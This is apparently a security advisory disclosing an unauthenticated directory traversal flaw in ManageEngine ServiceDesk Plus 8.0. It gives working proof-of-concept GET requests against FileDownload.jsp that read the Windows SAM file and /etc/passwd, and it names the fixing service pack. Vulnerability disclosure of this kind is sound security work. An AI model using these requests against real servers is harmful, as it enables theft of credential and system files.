Software Link: http://www.manageengine.com/products/service-desk/91677414/ManageEngine_ServiceDesk_Plus.exe Version: 8.0 [+] Introduction Directory traversal vulnerabilities has been found in ManageEngine ServiceDesk Plus 8.0 a web based helpdesk system written in Java. The vulnerability can be exploited to access local files by entering special characters in variables used to create file paths. The attackers use ?../? sequences to move up to root directory, thus permitting navigation through the file system. [+] Proof Of Concept A user doesnt need to login into the system to exploit this path traversal vulnerability as FileDownload.jsp doesnt checek for a valid login session. Request: GET http://[webserver IP]:8080/workorder/FileDownload.jsp?module=agent&&FILENAME=%20..\..\..\..\..\..\..\..\..\windows\repair\SAM GET http://[webserver IP]:8080/workorder/FileDownload.jsp?module=agent&&FILENAME=%20..\..\..\..\..\..\..\..\..\etc\passwd The issue is fixed with Service Pack Build 8012 found in the below link. http://www.manageengine.com/products/service-desk/91677414/ManageEngine_ServiceDesk_Plus_8_0_0_SP-0_12_0.ppm [+] Credits These vulnerability has been discovered by Keith Lee (keith.lee2012@gmail.com), @keith55, http://milo2012.wordpress.com -- Keith Blog: http://www.milo2012.wordpress.com Twitter: @keith55